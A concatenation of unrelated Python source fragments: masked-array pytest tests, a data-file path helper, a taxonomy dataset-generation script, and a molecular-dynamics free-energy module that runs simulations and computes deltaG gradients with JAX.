assert isinstance(arr, Array)
def test_getmaskarray():
arr = ma.getmaskarray()
assert isinstance(arr, Array)
@pytest.mark.parametrize("fill_value", [5, 5.0, True, np.int32(5), np.float64(5), None])
def test_filled(fill_value):
arr = ma.filled(fill_value)
assert isinstance(arr, Array)
def test_compressed():
arr = ma.compressed()
assert isinstance(arr, Array)
|
11483792
|
from __future__ import print_function, unicode_literals
import os
import sys
def data_filename(fname):
basedir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
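    # Search order: a local weblabdeusto_data/ folder, the installed sys.prefix,
    # the repo base dir, then the sibling client/ tree, falling back to the bare name.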
if os.path.exists(os.path.join(basedir, 'weblabdeusto_data', fname)):
return os.path.join(basedir, 'weblabdeusto_data', fname)
if os.path.exists(os.path.join(sys.prefix, 'weblabdeusto_data', fname)):
return os.path.join(sys.prefix, 'weblabdeusto_data', fname)
elif os.path.exists(os.path.join(basedir, fname)):
return os.path.abspath(os.path.join(basedir, fname))
elif os.path.exists(os.path.join(basedir, '..', '..', 'client', fname)):
return os.path.abspath(os.path.join(basedir, '..', '..', 'client', fname))
else:
return fname
|
11483802
|
import argparse
from data_loader.dataset import MAGDataset
def main(args):
binary_dataset = MAGDataset(name=args.taxon_name, path=args.data_dir, embed_suffix=args.embed_suffix, raw=True,
existing_partition=args.existing_partition, partition_pattern=args.partition_pattern,
shortest_path=args.shortest_path)
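    # Constructing MAGDataset with raw=True presumably performs the raw -> binary
    # conversion as a side effect; the returned object is not used further here.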
if __name__ == '__main__':
args = argparse.ArgumentParser(description='Generate binary data from one input taxonomy')
args.add_argument('-t', '--taxon_name', required=True, type=str, help='taxonomy name')
args.add_argument('-d', '--data_dir', required=True, type=str, help='path to data directory')
args.add_argument('-es', '--embed_suffix', default="", type=str, help='embed suffix indicating a specific initial embedding vectors')
args.add_argument('-p', '--existing_partition', default=1, type=int, help='whether to use the existing train/validation/test partition files')
args.add_argument('-pp', '--partition_pattern', default='internal', type=str, help='how to partition existing train/validation/test files', choices=['internal', 'leaf'])
    args.add_argument('-sp', '--shortest_path', default=0, type=int, help='whether to use shortest path margin loss')
args = args.parse_args()
args.existing_partition = (args.existing_partition == 1)
main(args)
|
11483887
|
from collections import namedtuple
import functools
import copy
import jax
import numpy as np
from timemachine.lib import potentials, custom_ops
from typing import Tuple, List, Any
import dataclasses
import jax.numpy as jnp
from fe.topology import BaseTopology, SingleTopology
from fe.free_energy import BaseFreeEnergy
from parallel.client import SerialClient
from md import minimizer
from md.states import CoordsVelBox
from md.barostat.utils import get_bond_list, get_group_indices
from timemachine.lib import LangevinIntegrator, MonteCarloBarostat
@dataclasses.dataclass
class SimulationResult:
xs: np.array
du_dls: np.array
du_dps: np.array
def flatten(v):
return tuple(), (v.xs, v.du_dls, v.du_dps)
def unflatten(aux_data, children):
xs, du_dls, du_dps = aux_data
return SimulationResult(xs, du_dls, du_dps)
jax.tree_util.register_pytree_node(SimulationResult, flatten, unflatten)
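# Registering SimulationResult as a pytree with no children: the arrays ride along
# as static aux_data, so results can pass through jax transformations (e.g. the
# custom_vjp below) without being traced.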
def equilibrate(integrator, barostat, potentials, coords, box, lamb, equil_steps) -> Tuple:
all_impls = []
v0 = np.zeros_like(coords)
for bp in potentials:
impl = bp.bound_impl(np.float32)
all_impls.append(impl)
if integrator.seed == 0:
integrator = copy.deepcopy(integrator)
integrator.seed = np.random.randint(np.iinfo(np.int32).max)
if barostat.seed == 0:
barostat = copy.deepcopy(barostat)
barostat.seed = np.random.randint(np.iinfo(np.int32).max)
intg_impl = integrator.impl()
baro_impl = barostat.impl(all_impls)
# context components: positions, velocities, box, integrator, energy fxns
ctxt = custom_ops.Context(
coords,
v0,
box,
intg_impl,
all_impls,
barostat=baro_impl,
)
# equilibration
equil_schedule = np.ones(equil_steps) * lamb
ctxt.multiple_steps(equil_schedule)
return CoordsVelBox(coords=ctxt.get_x_t(), velocities=ctxt.get_v_t(), box=ctxt.get_box())
def simulate(
lamb,
box,
x0,
v0,
final_potentials,
integrator,
equil_steps,
prod_steps,
barostat,
x_interval=1000,
du_dl_interval=5,
) -> SimulationResult:
"""
Run a simulation and collect relevant statistics for this simulation.
Parameters
----------
lamb: float
lambda parameter
box: np.array
3x3 numpy array of the box, dtype should be np.float64
x0: np.array
Nx3 numpy array of the coordinates
v0: np.array
Nx3 numpy array of the velocities
final_potentials: list
list of unbound potentials
integrator: timemachine.Integrator
integrator to be used for dynamics
equil_steps: int
number of equilibration steps
prod_steps: int
number of production steps
x_interval: int
how often we store coordinates. if x_interval == 0 then
no frames are returned.
du_dl_interval: int
how often we store du_dls. if du_dl_interval == 0 then
no du_dls are returned
barostat: timemachine.lib.MonteCarloBarostat
Monte carlo barostat to use when simulating.
Returns
-------
SimulationResult
Results of the simulation.
"""
all_impls = []
bonded_impls = []
nonbonded_impls = []
# set up observables for du_dps here as well.
du_dp_obs = []
for bp in final_potentials:
impl = bp.bound_impl(np.float32)
if isinstance(bp, potentials.Nonbonded):
nonbonded_impls.append(impl)
else:
bonded_impls.append(impl)
all_impls.append(impl)
du_dp_obs.append(custom_ops.AvgPartialUPartialParam(impl, 5))
if integrator.seed == 0:
integrator = copy.deepcopy(integrator)
integrator.seed = np.random.randint(np.iinfo(np.int32).max)
if barostat.seed == 0:
barostat = copy.deepcopy(barostat)
barostat.seed = np.random.randint(np.iinfo(np.int32).max)
intg_impl = integrator.impl()
baro_impl = barostat.impl(all_impls)
# context components: positions, velocities, box, integrator, energy fxns
ctxt = custom_ops.Context(
x0,
v0,
box,
intg_impl,
all_impls,
barostat=baro_impl,
)
base_interval = baro_impl.get_interval()
# Use an interval of 5 for equilibration
baro_impl.set_interval(5)
# equilibration
equil_schedule = np.ones(equil_steps) * lamb
ctxt.multiple_steps(equil_schedule)
baro_impl.set_interval(base_interval)
for obs in du_dp_obs:
ctxt.add_observable(obs)
prod_schedule = np.ones(prod_steps) * lamb
full_du_dls, xs, _ = ctxt.multiple_steps(prod_schedule, du_dl_interval, x_interval)
# keep the structure of grads the same as that of final_potentials so we can properly
# form their vjps.
grads = []
for obs in du_dp_obs:
grads.append(obs.avg_du_dp())
result = SimulationResult(xs=xs.astype("float32"), du_dls=full_du_dls, du_dps=grads)
return result
FreeEnergyModel = namedtuple(
"FreeEnergyModel",
[
"unbound_potentials",
"client",
"box",
"x0",
"v0",
"integrator",
"lambda_schedule",
"equil_steps",
"prod_steps",
"barostat",
],
)
gradient = List[Any] # TODO: make this more descriptive of dG_grad structure
def _deltaG(model, sys_params) -> Tuple[Tuple[float, List], np.array]:
assert len(sys_params) == len(model.unbound_potentials)
bound_potentials = []
for params, unbound_pot in zip(sys_params, model.unbound_potentials):
bp = unbound_pot.bind(np.asarray(params))
bound_potentials.append(bp)
client = model.client
if client is None:
client = SerialClient()
client.verify()
futures = []
for lamb in model.lambda_schedule:
args = (
lamb,
model.box,
model.x0,
model.v0,
bound_potentials,
model.integrator,
model.equil_steps,
model.prod_steps,
model.barostat,
)
kwargs = {} # Unused for now
futures.append(client.submit(simulate, *args, **kwargs))
results = [x.result() for x in futures]
mean_du_dls = []
for result in results:
# (ytz): figure out what to do with stddev(du_dl) later
mean_du_dls.append(np.mean(result.du_dls))
dG = np.trapz(mean_du_dls, model.lambda_schedule)
dG_grad = []
for rhs, lhs in zip(results[-1].du_dps, results[0].du_dps):
dG_grad.append(rhs - lhs)
return (dG, results), dG_grad
@functools.partial(jax.custom_vjp, nondiff_argnums=(0,))
def deltaG(model, sys_params) -> Tuple[float, List]:
return _deltaG(model=model, sys_params=sys_params)[0]
def deltaG_fwd(model, sys_params) -> Tuple[Tuple[float, List], np.array]:
"""same signature as DeltaG, but returns the full tuple"""
return _deltaG(model=model, sys_params=sys_params)
def deltaG_bwd(model, residual, grad) -> Tuple[np.array]:
"""Note: nondiff args must appear first here, even though one of them appears last in the original function's signature!"""
# residual are the partial dG / partial dparams for each term
# grad[0] is the adjoint of dG w.r.t. loss: partial L/partial dG
# grad[1] is the adjoint of dG w.r.t. simulation result, which we don't use
return ([grad[0] * r for r in residual],)
deltaG.defvjp(deltaG_fwd, deltaG_bwd)
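# Minimal usage sketch (hypothetical; assumes `model` is a FreeEnergyModel and
# `sys_params` is a list of parameter arrays matching model.unbound_potentials):
#   dG, results = deltaG(model, sys_params)
#   grads = jax.grad(lambda p: deltaG(model, p)[0])(sys_params)
# The custom VJP sends the dG adjoint through deltaG_bwd, which scales the
# per-term du/dp residuals; `model` itself is a nondiff argument.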
|